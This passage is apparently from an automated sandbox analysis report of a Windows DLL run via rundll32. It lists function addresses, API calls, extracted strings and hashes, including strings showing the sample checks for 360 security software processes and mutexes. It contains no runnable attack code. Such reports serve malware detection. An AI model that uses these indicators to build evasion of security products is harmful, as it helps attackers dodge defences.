Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: AddressProc$AppendCriticalPathSection$memset$EnterFileModuleName$??2@CountErrorInitializeLastLeaveSpin
String ID: ..\deepscan\$speedmem2.hg
API String ID: 2338990259-1390971677
Opcode ID: 1f5c69f5d04849719002e6335fbd6f545d460fa84012e21aa4d7e04e73bbc5ea
Instruction ID: 91bce694e0342d9d21a92653d8ecf9702c458f92e478111cc4d5f0d53c5c3f7e
Opcode Fuzzy Hash: 1f5c69f5d04849719002e6335fbd6f545d460fa84012e21aa4d7e04e73bbc5ea
Instruction Fuzzy Hash: BB212C35215B4D81EA928B64FC953996360FB5C7E4F409215E96D077B4EF78C64EC700

Uniqueness

Uniqueness Score: -1.00%

Function 000000018004242C Relevance: 13.7, APIs: 9, Instructions: 156networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000180066050: EnterCriticalSection.KERNEL32 ref: 0000000180066098
Part of subcall function 0000000180066050: LeaveCriticalSection.KERNEL32 ref: 00000001800660E1

Part of subcall function 0000000180043154: ??_V@YAXPEAX@Z.MSVCRT ref: 0000000180043187
Part of subcall function 0000000180043154: htonl.WS2_32 ref: 00000001800431F3

??_V@YAXPEAX@Z.MSVCRT ref: 0000000180042510
??_V@YAXPEAX@Z.MSVCRT ref: 000000018004253B
htons.WS2_32 ref: 0000000180042586
htonl.WS2_32 ref: 0000000180042596
htons.WS2_32 ref: 00000001800425A4
memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00000001800425C3
??_V@YAXPEAX@Z.MSVCRT ref: 00000001800425E6
??_V@YAXPEAX@Z.MSVCRT ref: 0000000180042612
??_V@YAXPEAX@Z.MSVCRT ref: 0000000180042632

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: CriticalSectionhtonlhtons$EnterLeavememmove
String ID:
API String ID: 33644419-0
Opcode ID: c447bd6221281bfe5dd6872084f78464a8d5e064d41710de40e0bf531ce06f55
Instruction ID: 90b71582b8c4a32b78347334d3d295f004072f45cff62f784db803bd1658b447
Opcode Fuzzy Hash: c447bd6221281bfe5dd6872084f78464a8d5e064d41710de40e0bf531ce06f55
Instruction Fuzzy Hash: 69614736B00B549AF792DFA1E9503ED33B5B70878CF458019EE5627A98DF34866EC348

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180075290 Relevance: 13.7, APIs: 9, Instructions: 153COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 00000001800752E8
___lc_handle_func.MSVCRT ref: 000000018007530C
_errno.MSVCRT ref: 0000000180075349

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: _errno$___lc_handle_func
String ID:
API String ID: 1446566272-0
Opcode ID: 9ed143e4e78ad7ca36c430c2939c308b5d5fe1ebbbc6467e3c222cd59980e3d6
Instruction ID: 126987ea53a22a0156f2cb7aa7a647ca75503bfd193424e832b10eaea163e651
Opcode Fuzzy Hash: 9ed143e4e78ad7ca36c430c2939c308b5d5fe1ebbbc6467e3c222cd59980e3d6
Instruction Fuzzy Hash: 5851E77270434487FB975F69A0403EDA290AB88BD5F58C034BBCC47AD6DE7DCA9A8710

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180014F24 Relevance: 13.6, APIs: 9, Instructions: 146COMMON

Download Yara Rule

APIs

SafeArrayCreate.OLEAUT32 ref: 0000000180014FEE
VariantInit.OLEAUT32 ref: 0000000180015009
SafeArrayPutElement.OLEAUT32 ref: 000000018001503B
VariantInit.OLEAUT32 ref: 0000000180015069
VariantInit.OLEAUT32 ref: 0000000180015094

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: InitVariant$ArraySafe$CreateElement
String ID:
API String ID: 3308809976-0
Opcode ID: 3e6f35141bead04b4f889ba04b40996eb253cad0316321e95f0b8ebe6d532838
Instruction ID: 146264a788ca7c4eb20d782c9947d04824275c30ee96bc1b713ea33f9e3da92e
Opcode Fuzzy Hash: 3e6f35141bead04b4f889ba04b40996eb253cad0316321e95f0b8ebe6d532838
Instruction Fuzzy Hash: 52515A32B00A548AE781CFA5EC843DD37B0F7487A9F158125EA5A97764EF34C64AC340

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800494C4 Relevance: 13.6, APIs: 9, Instructions: 60COMMON

Download Yara Rule

APIs

??_U@YAPEAX_K@Z.MSVCRT ref: 00000001800494DA
GetCurrentProcess.KERNEL32 ref: 00000001800494FB
OpenProcessToken.ADVAPI32 ref: 000000018004950E
GetTokenInformation.ADVAPI32 ref: 0000000180049533
CloseHandle.KERNEL32 ref: 0000000180049540
GetSidSubAuthorityCount.ADVAPI32 ref: 000000018004954D
GetLastError.KERNEL32 ref: 0000000180049556
GetSidSubAuthority.ADVAPI32 ref: 000000018004956F
??_V@YAXPEAX@Z.MSVCRT ref: 000000018004958A

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: AuthorityProcessToken$CloseCountCurrentErrorHandleInformationLastOpen
String ID:
API String ID: 3222153630-0
Opcode ID: 03483a1382fa936570146296bc3f4c9eb4d3748e16a6552bbad511bfd4114ef8
Instruction ID: 72112d729816a6905d55889d123a89fc47246d9648d7bb45982a69a3b8d3ada9
Opcode Fuzzy Hash: 03483a1382fa936570146296bc3f4c9eb4d3748e16a6552bbad511bfd4114ef8
Instruction Fuzzy Hash: A8215131705B4882FB969F92F880399A3A4FBDCBC4F158035EA5957764DF3CC6598704

Uniqueness

Uniqueness Score: -1.00%

Function 000000018004578C Relevance: 12.7, APIs: 4, Strings: 3, Instructions: 443COMMON

Download Yara Rule

APIs

Part of subcall function 000000018000A7AC: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000180001020), ref: 000000018000A7D5

wcsstr.MSVCRT ref: 00000001800458CB
wcsstr.MSVCRT ref: 0000000180045909
_time64.MSVCRT ref: 0000000180045A50
free.MSVCRT ref: 0000000180045AD0

Strings

error_code, xrefs: 000000018004580D
DomainQuery, xrefs: 0000000180045863
com, xrefs: 00000001800457D2, 0000000180045814

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: wcsstr$HeapProcess_time64free
String ID: DomainQuery$com$error_code
API String ID: 495166474-1186067173
Opcode ID: 48d2666e35a99de3c2b6d37465d73b0056f431e6c8eee1a5ce3d51caaf477776
Instruction ID: 59fbc5dadb6708d67137b6e4bedff87eb2f76b606422a1c9441d9b3eaf16e58a
Opcode Fuzzy Hash: 48d2666e35a99de3c2b6d37465d73b0056f431e6c8eee1a5ce3d51caaf477776
Instruction Fuzzy Hash: 6802C372701F4882EA91DB29D8803DD23A0FB88BE9F458215FAAD577D5DF38CA49C744

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001E59C Relevance: 12.6, APIs: 3, Strings: 4, Instructions: 311COMMON

Download Yara Rule

APIs

??_U@YAPEAX_K@Z.MSVCRT ref: 000000018001E625
??_V@YAXPEAX@Z.MSVCRT ref: 000000018001E6A1
_wcsicmp.MSVCRT ref: 000000018001E926

Strings

SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\, xrefs: 000000018001E8CC
.exe, xrefs: 000000018001E5A5, 000000018001E919
InitString, xrefs: 000000018001E741
%I64u, xrefs: 000000018001E7A3

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: _wcsicmp
String ID: %I64u$.exe$InitString$SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
API String ID: 2081463915-3789319691
Opcode ID: a7524d0a6a2f2a6811e2d6bfe887dea111f6d1a43d9b514e68db11bdf2e08a92
Instruction ID: 99d661dcfab4fd9f60583e58d61e1d075c9151c162a47e32eebc6396990c7acc
Opcode Fuzzy Hash: a7524d0a6a2f2a6811e2d6bfe887dea111f6d1a43d9b514e68db11bdf2e08a92
Instruction Fuzzy Hash: A8C1B172710A488AEB929B25D8407DD33A0F749BE8F448216FE6D47BE5DF38C689C744

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180036EC8 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 238COMMON

Download Yara Rule

APIs

wcschr.MSVCRT ref: 0000000180036F7A
_wcslwr.MSVCRT ref: 0000000180036FC8
wcschr.MSVCRT ref: 0000000180037043
wcscmp.MSVCRT ref: 00000001800370A6
wcscmp.MSVCRT ref: 00000001800370BA

Part of subcall function 000000018000A7AC: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000180001020), ref: 000000018000A7D5

Part of subcall function 000000018001B6F0: wcsstr.MSVCRT ref: 000000018001B73B
Part of subcall function 000000018001B6F0: wcsstr.MSVCRT ref: 000000018001B764
Part of subcall function 000000018001B6F0: IIDFromString.OLE32 ref: 000000018001B7CF

Strings

clsid, xrefs: 000000018003709B
clsid2, xrefs: 00000001800370AF

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: wcschrwcscmpwcsstr$FromHeapProcessString_wcslwr
String ID: clsid$clsid2
API String ID: 2934854147-3646038404
Opcode ID: 911e3de000ae97c58b3acce3279f437468a1569be05101070c01195505b2f66e
Instruction ID: bd95a24bb0aafbb45aea4f5794df0f126b37bc211fbb868afd4ed2029302fca7
Opcode Fuzzy Hash: 911e3de000ae97c58b3acce3279f437468a1569be05101070c01195505b2f66e
Instruction Fuzzy Hash: 86A16172701A4885EBA79B29C8503EE63A1FB49BD4F46C122FA1D477D6EF74CA49C340

Uniqueness

Uniqueness Score: -1.00%

Function 000000018003721C Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 234stringCOMMON

Download Yara Rule

APIs

strchr.MSVCRT ref: 00000001800372BF
_strlwr.MSVCRT ref: 000000018003730C
strchr.MSVCRT ref: 0000000180037387
wcscmp.MSVCRT ref: 00000001800373E9
wcscmp.MSVCRT ref: 00000001800373FD

Part of subcall function 000000018000A7AC: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000180001020), ref: 000000018000A7D5

Part of subcall function 000000018001B6F0: wcsstr.MSVCRT ref: 000000018001B73B
Part of subcall function 000000018001B6F0: wcsstr.MSVCRT ref: 000000018001B764
Part of subcall function 000000018001B6F0: IIDFromString.OLE32 ref: 000000018001B7CF

Strings

clsid, xrefs: 00000001800373DE
clsid2, xrefs: 00000001800373F2

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: strchrwcscmpwcsstr$FromHeapProcessString_strlwr
String ID: clsid$clsid2
API String ID: 3075496951-3646038404
Opcode ID: b34bb257c4012ea5ea7ec63a1f36afb4f32d3c0f990deb4b92841445b61a349c
Instruction ID: 52fbb44663529e4af6cb5c57c7c12c2662acde33668ab69cc9482a834562ed8e
Opcode Fuzzy Hash: b34bb257c4012ea5ea7ec63a1f36afb4f32d3c0f990deb4b92841445b61a349c
Instruction Fuzzy Hash: B3A14E72301A4886EBA79B25C4503EE67A1BB49BD8F45C121FA1D477D6EF78CA89C340

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180068390 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 0000000180067B20: memset.MSVCRT ref: 0000000180067B76

memset.MSVCRT ref: 0000000180068455
memmove.MSVCRT ref: 000000018006849B
??3@YAXPEAX@Z.MSVCRT ref: 00000001800684CF
memmove.MSVCRT ref: 0000000180068525
??3@YAXPEAX@Z.MSVCRT ref: 0000000180068555

Strings

unknown error, xrefs: 00000001800683F1
generic, xrefs: 0000000180068580

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: ??3@memmovememset
String ID: generic$unknown error
API String ID: 2528313377-3628847473
Opcode ID: de4f988636b97df9b255ecc11943299432ed388bb3462f1d961b5968a0cd6148
Instruction ID: f953be595861da4e4b866d1587ee45b735e1f1b3269ec21885f27e4079069760
Opcode Fuzzy Hash: de4f988636b97df9b255ecc11943299432ed388bb3462f1d961b5968a0cd6148
Instruction Fuzzy Hash: 4451A372704B8882EF459B16DA443AD6362F749BD0F50C221FB6A07BD6EF78C6A59340

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800744F0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 127libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32 ref: 000000018007460C
FreeLibrary.KERNEL32 ref: 000000018007466D
GetModuleHandleW.KERNEL32 ref: 000000018007468D
GetProcAddress.KERNEL32 ref: 00000001800746A2

Strings

kernel32, xrefs: 0000000180074686
AddDllDirectory, xrefs: 0000000180074698

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: Library$AddressFreeHandleLoadModuleProc
String ID: AddDllDirectory$kernel32
API String ID: 1437655972-3758863895
Opcode ID: 62d5c79b2ea4fb088856e3f0301c9a109d3b9d8bbbaf54877c47554339dab04f
Instruction ID: bbf3e12eda5f2f818c86a6d8723dcf8fbef42ab492d342ab48d7d832c77590ad
Opcode Fuzzy Hash: 62d5c79b2ea4fb088856e3f0301c9a109d3b9d8bbbaf54877c47554339dab04f
Instruction Fuzzy Hash: 7751E53231164885FEA6CF51E4103E962A0FB5DBE4F48C621EA6A4B7D4DF3DC649C705

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180040688 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 105COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000180040746
LeaveCriticalSection.KERNEL32 ref: 000000018004078F

Part of subcall function 00000001800432C8: memset.MSVCRT ref: 0000000180043335

std::exception_ptr::exception_ptr.LIBCONCRT ref: 0000000180040802
std::_XGetLastError.LIBCPMT ref: 0000000180040811

Strings

x64, xrefs: 000000018004079E
x86, xrefs: 00000001800407B0
arm64, xrefs: 0000000180040713

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: CriticalSection$EnterErrorLastLeavememsetstd::_std::exception_ptr::exception_ptr
String ID: arm64$x64$x86
API String ID: 4069188616-280937049
Opcode ID: 80f3249773d162cbeeb550be5abaaeac6b7c95d6a1b3ac1e44b50876622fa97b
Instruction ID: 117583cd4254ef97ff9b72dc100ece26d9127ce95370434fd6434e2e215e4972
Opcode Fuzzy Hash: 80f3249773d162cbeeb550be5abaaeac6b7c95d6a1b3ac1e44b50876622fa97b
Instruction Fuzzy Hash: 78415B71B00A1C95FA92DB20EC843D937A4F70C7E8FA58611F96A536E6DF34C68AC740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180040E18 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 87libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 0000000180040ECE
GetProcAddress.KERNEL32 ref: 0000000180040EDE
GetCurrentProcess.KERNEL32 ref: 0000000180040EF6
std::exception_ptr::exception_ptr.LIBCONCRT ref: 0000000180040F64
std::_XGetLastError.LIBCPMT ref: 0000000180040F72

Strings

Kernel32.dll, xrefs: 0000000180040EC7
IsWow64Process2, xrefs: 0000000180040ED7

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: AddressCurrentErrorHandleLastModuleProcProcessstd::_std::exception_ptr::exception_ptr
String ID: IsWow64Process2$Kernel32.dll
API String ID: 1364622999-2175735969
Opcode ID: 6751241f688bd49d1875dc8d854f79e14c2fff9f0de6f06901ba81ab434c2c27
Instruction ID: 5a1c62e2a9ead4f3428123871bab1930646db393e55966b9c052552951b7636c
Opcode Fuzzy Hash: 6751241f688bd49d1875dc8d854f79e14c2fff9f0de6f06901ba81ab434c2c27
Instruction Fuzzy Hash: DD416531204B4991EAA2CF14EC843DA73A4FB8D794FA18226F659437A5DF38CB4DCB44

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800197DC Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 70COMMON

Download Yara Rule

APIs

OpenMutexW.KERNEL32 ref: 0000000180019866
GetLastError.KERNEL32 ref: 0000000180019871
OpenMutexW.KERNEL32 ref: 00000001800198D2
GetLastError.KERNEL32 ref: 00000001800198DD

Strings

Local\Q360MonMutex, xrefs: 0000000180019855
Local\Q360SafeI18NTray, xrefs: 00000001800198C1

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: ErrorLastMutexOpen
String ID: Local\Q360MonMutex$Local\Q360SafeI18NTray
API String ID: 2816522056-3343745797
Opcode ID: ecc565a9ab11a347c3d3f5477b7a4cd1cc110664247bbd5ff13aaeded14a432c
Instruction ID: ccff18e50d48ae3a619361c3ef7b9f3de39f23092404f672028fbe7f8de5d576
Opcode Fuzzy Hash: ecc565a9ab11a347c3d3f5477b7a4cd1cc110664247bbd5ff13aaeded14a432c
Instruction Fuzzy Hash: E8314B30502B5982F7D29BA4BC943E823A8F74EBA0F558124F569823E1CF39CB9CC700

Uniqueness

Uniqueness Score: -1.00%

Function 000000018003C6D8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 69libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 000000018001AD68: InitializeCriticalSection.KERNEL32(?,?,?,?,?,000000018001AFD5), ref: 000000018001ADCE

EnterCriticalSection.KERNEL32 ref: 000000018003C719
LeaveCriticalSection.KERNEL32 ref: 000000018003C72D
LeaveCriticalSection.KERNEL32 ref: 000000018003C750
GetProcAddress.KERNEL32 ref: 000000018003C77C
FreeLibrary.KERNEL32 ref: 000000018003C7AE
LeaveCriticalSection.KERNEL32 ref: 000000018003C7BF

Strings

InitLibs, xrefs: 000000018003C772

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: CriticalSection$Leave$AddressEnterFreeInitializeLibraryProc
String ID: InitLibs
API String ID: 388043826-2748520195
Opcode ID: d54e888b80642ae16c136f4daec8858b4574610897ae795fcaa0a3f587715d16
Instruction ID: 14a8bfa7cef1bdae3a626f07b321ff872beb2833b4a3adf2d3b4914cd80619d3
Opcode Fuzzy Hash: d54e888b80642ae16c136f4daec8858b4574610897ae795fcaa0a3f587715d16
Instruction Fuzzy Hash: 5631953661874882EBA78F25A4547AE23B0F78DFD4F1A9125ED5A473A4DF38C649CB00

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001B004 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 44COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 000000018001B03F
GetModuleFileNameW.KERNEL32 ref: 000000018001B051
PathFindFileNameW.SHLWAPI ref: 000000018001B05C
_wcsicmp.MSVCRT ref: 000000018001B074
_wcsicmp.MSVCRT ref: 000000018001B094

Strings

360tray.exe, xrefs: 000000018001B06A
QHSafeTray.exe, xrefs: 000000018001B08A

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: FileName_wcsicmp$FindModulePathmemset
String ID: 360tray.exe$QHSafeTray.exe
API String ID: 2436975468-72543816
Opcode ID: a7768d738e7b534716dd32aca9e4ff23bf3b7449249a9ac96035ea6388957e04
Instruction ID: f13d88eabac643da90db78e2c45270d8f51b6174de2d3bfd56aa28c15744bb18
